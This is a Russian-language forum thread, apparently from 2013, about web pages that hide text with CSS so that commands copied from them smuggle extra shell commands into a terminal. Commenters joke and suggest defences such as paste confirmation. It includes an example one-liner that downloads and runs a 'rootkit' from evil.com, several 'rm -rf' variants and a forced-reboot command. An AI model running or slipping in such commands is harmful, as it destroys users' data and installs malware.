| |
| |
| 3.26, Аноним (-), 14:03, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
Не беда! Теперь вместо
выделить(что-то), копировать, вставить
>>
выделить(что-то), копировать, вставить,
+
выделить(только то, что действительно можно), вставить
ничетаковерхедпонадобитсяновыямышь
| | |
| |
| 4.36, pavlinux (ok), 15:06, 08/04/2013 [^] [^^] [^^^] [ответить]
| +2 +/– |
 Похожий "эксплойт" был на заре WWW, когда народ понял, что можно писать текст цветом бэкграунда. :)
| | |
| |
| 5.51, 80е (?), 20:41, 08/04/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
> Похожий "эксплойт" был на заре WWW, когда народ понял, что можно писать
> текст цветом бэкграунда. :)
И без зари, и без заката WWW я отродясь копирую текст сначала в самый тупой из редакторов, чтобы просмотреть его перед переносом в промпт.
| | |
| |
| 6.65, pavlinux (ok), 05:25, 09/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
> я отродясь копирую текст сначала в самый тупой из редакторов,
> чтобы просмотреть его перед переносом в промпт.
Да-да-да, конечно-конечно-конечно, мы тебе верим!
| | |
|
|
|
|
|
| 1.2, Аноним (-), 10:15, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– |
Это скорее недоработка, чем дырень.
[сообщение отредактировано модератором]
| | |
| 1.3, Okarin (ok), 10:24, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
 Да это просто 10 из 10! Ждем эпидемию вандализма в вики дистрибутивов!
| | |
| |
| 2.60, MrClon (?), 00:40, 09/04/2013 [^] [^^] [^^^] [ответить]
| +/– | |
> Да это просто 10 из 10! Ждем эпидемию вандализма в вики дистрибутивов!
В вики это не сработает, в них как правило HTML юзать не дают, только свою разметку.
| | |
|
| |
| 2.50, 80е (?), 20:38, 08/04/2013 [^] [^^] [^^^] [ответить]
| –1 +/– | |
> шикарно же, как это еще раньше не нашли?
ты больной? кто там этого «раньше не находил»???
| | |
|
| 1.6, Аноним (-), 10:40, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Видимо, следующее первое апреля будет на редкость удачным. :)
Ждем появления специальных тем для юзеров, словивших таким образом 'rm -rf $HOME &'.
| | |
| |
| 2.11, Аноним (-), 11:03, 08/04/2013 [^] [^^] [^^^] [ответить]
| –1 +/– |
А при чем тут HTML5? В указанной конструкции нет ни 1 элемента из HTML5 :)
| | |
| |
| 3.13, Аноним (-), 11:18, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
Ну, я про HTML5 и не писал. Да и насколько мне известно, среднестатистический shell пока что кроме bash/csh/ksh скриптов ничего другого не разумеет. Хотя, быть может, наступят те светлые времена, когда HTML-теги можно будет набивать прямо в терминале. А вместо bash будет JavaScript. :)
| | |
| 3.15, Аноним (-), 11:22, 08/04/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
В дополнение:
<rm path="$HOME" class="noecho"/>
Я джва года жду такой shell...
| | |
| |
| 4.61, MrClon (?), 00:46, 09/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
> В дополнение:
> <rm path="$HOME" class="noecho"/>
> Я джва года жду такой shell...
class="noecho,force,recursive"
| | |
|
|
|
| 1.12, skybon (ok), 11:17, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]
| –1 +/– |
 Ну много же всяких, которые тянут любое говно в ближайший терминал без оглядки.
| | |
| 1.17, Аноним (-), 11:40, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]
| +2 +/– |
Ну так копировать сначала в текстовый редактор и смотреть, что вставилось. Лишнее убирать и только затем в терминал.
| | |
| |
| 2.21, zzzzz (??), 13:20, 08/04/2013 [^] [^^] [^^^] [ответить]
| –1 +/– |
> Ну так копировать сначала в текстовый редактор и смотреть, что вставилось. Лишнее
> убирать и только затем в терминал.
хоть кто-то так делает? а сколько людей читают новостные сайты? да эта хрень просто бомба. единственный способ защиты - встроить во все терминалы проверку при вставке текста на наличие ";" и выдавать пользователю окошко с предупреждением.
| | |
| |
| 3.22, GotF (ok), 13:33, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
 > единственный способ защиты - встроить во все терминалы проверку при вставке текста на наличие ";" и выдавать пользователю окошко с предупреждением.
При чём тут ";"? Ловить надо перевод строки.
| | |
| |
| 4.23, Аноним (-), 13:55, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
По уму, надо бы просто чтобы невидимый текст никуда не копировался.
| | |
| |
| 5.30, GotF (ok), 14:20, 08/04/2013 [^] [^^] [^^^] [ответить]
| +1 +/– | |
> По уму, надо бы просто чтобы невидимый текст никуда не копировался.
Ну как бы да, но беда в том, что в этих ваших интернетах есть 1001 способ сделать текст невидимым. В общем, всё как обычно сводится к прокладке между креслом и клавиатурой.
| | |
|
| 4.25, cmp (ok), 14:03, 08/04/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
 echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh && chmod 0755 /usr/bin/rootkit.sh && rootkit.sh' > /dev/null 2>&1 & clear && git clone git://kernel.org
| | |
| |
| 5.29, GotF (ok), 14:18, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
> echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh &&
> chmod 0755 /usr/bin/rootkit.sh && rootkit.sh' > /dev/null 2>&1 & clear &&
> git clone git://kernel.org
Это всё чудесно, но без '\n' в нужном месте не выполнится :)
| | |
|
|
|
|
| 1.18, Слакварявод (?), 11:58, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
В clipper-е в кедах видно сразу что там в буфер забилось! можно там глядеть, прежде чем вставлять!
| | |
| 1.28, pavlinux (ok), 14:17, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– |
Ваще-то это дыра в браузерах - то, что копируются не выделенные символы, а хрень какая-то.
| | |
| |
| 2.32, Клыкастый (ok), 14:25, 08/04/2013 [^] [^^] [^^^] [ответить]
| +2 +/– |
 эта милая привычка браузеров выделять не то, что я вижу, а ещё всякую html разметку мне никогда не нравилась.
| | |
| |
| 3.58, Михрютка (ok), 23:46, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
 > эта милая привычка браузеров выделять не то, что я вижу, а ещё
> всякую html разметку мне никогда не нравилась.
Сусли^WТекст за пределами окна ты тож не видишь. А он есть.
| | |
|
| 2.57, Михрютка (ok), 23:42, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– | |
в CSS
span style="position: absolute; left: -100px; top: -100px"
именно выделенные символы и копируются, все по чесноку.
| | |
|
| |
| 2.34, angra (ok), 14:34, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
 В "простом тексте" уже могут быть переводы строки. Да и вычитывать большой блок вряд ли кто-то станет, особенно после вычитки его в браузере.
| | |
| |
| 3.35, Клыкастый (ok), 14:39, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– | |
ну тогда - "ой!"
- вычитываем в vim-е.
- да и вообще копипастить отучаемся.
оригинальная "дырка" на самом деле. на 90% - social engineering.
| | |
| |
| 4.52, Stax (ok), 20:57, 08/04/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
 Гм. А вот если там последовательность <esc>:q!rm -rf /<enter> ? А вы в вим вставляете..
| | |
| |
| 5.53, Клыкастый (ok), 21:45, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– | |
> Гм. А вот если там последовательность <esc>:q!rm -rf /<enter> ? А вы в вим вставляете..
уже лучше. и под десяток всего!
| | |
|
|
|
|
| 1.37, Аноним (-), 15:22, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]
| –6 +/– |
Не понимаю сути проблемы. В гну/линукс такой бардак что написать строчку которая заработает у других людей даже в том же дичтрибутиве очень сложно.
обычно просто нечего копипастить
| | |
| |
| |
| |
| |
| |
| 6.63, Xasd (ok), 03:15, 09/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
$ reboot
bash: reboot: command not found...
$ shutdown -h now
bash: shutdown: command not found...
и даже так (!) :
$ bash
bash: bash: command not found...
$ ls /bin/ /usr/bin/
ls: cannot access /bin/: No such file or directory
ls: cannot access /usr/bin/: No such file or directory
| | |
| |
| 7.66, pavlinux (ok), 05:29, 09/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
>[оверквотинг удален]
> $ shutdown -h now
> bash: shutdown: command not found...
>
> и даже так (!) :
>
$ bash
> bash: bash: command not found...
> $ ls /bin/ /usr/bin/
> ls: cannot access /bin/: No such file or directory
> ls: cannot access /usr/bin/: No such file or directory
>
echo b > /proc/sysrq-trigger
| | |
|
|
|
|
|
| 2.40, Онононо (?), 17:15, 08/04/2013 [^] [^^] [^^^] [ответить]
| +1 +/– |
понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать на любой ОС где есть доступ к шелу.
| | |
| |
| 3.42, Аноним (-), 18:02, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
> понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать
> на любой ОС где есть доступ к шелу.
Пользователи винды не очень часто вставляют комманды с веб-сайтов в cmd.exe
| | |
| |
| 4.43, Аноним (-), 18:25, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
Для пользователей винды то ли на Баше, то ли ItHappens был описан Формат Улыбки:
Команда format C:, подтвердить, и после перезагрузки ваш компьютер будет работать гораздо быстрее
| | |
| 4.46, Аноним (-), 19:16, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– | |
> Пользователи винды не очень часто знают что такое cmd.exe
так правильно.
| | |
| |
| 5.68, Аноним (-), 16:55, 10/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
>> Пользователи винды не очень часто знают что такое cmd.exe
> так правильно.
А должны?
| | |
|
| 4.56, Харитон (?), 22:22, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
>> понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать
>> на любой ОС где есть доступ к шелу.
> Пользователи винды не очень часто вставляют комманды с веб-сайтов в cmd.exe
как бы сказать уних такой возможности даже нет...
вот павершеле...)))
там и возможности пошире...
| | |
|
| 3.45, Аноним (-), 19:14, 08/04/2013 [^] [^^] [^^^] [ответить]
| +/– |
Я про то почти никогда не имеет смысл что-то копипастить с сайтов.
В прочем url всегда копипастю так что... В общем как страшно жить.
| | |
|
|
| 1.59, Михрютка (ok), 23:50, 08/04/2013 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
постить на опеннете новости с угловыми скобками в тексте - идеальный метод троллинга аудитории.
| | |
| 1.67, Аноним (-), 13:15, 09/04/2013 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
В urxvt есть плагин confirm-paste, требующий подтверждения при вставке многострочного текста.
| | |
|
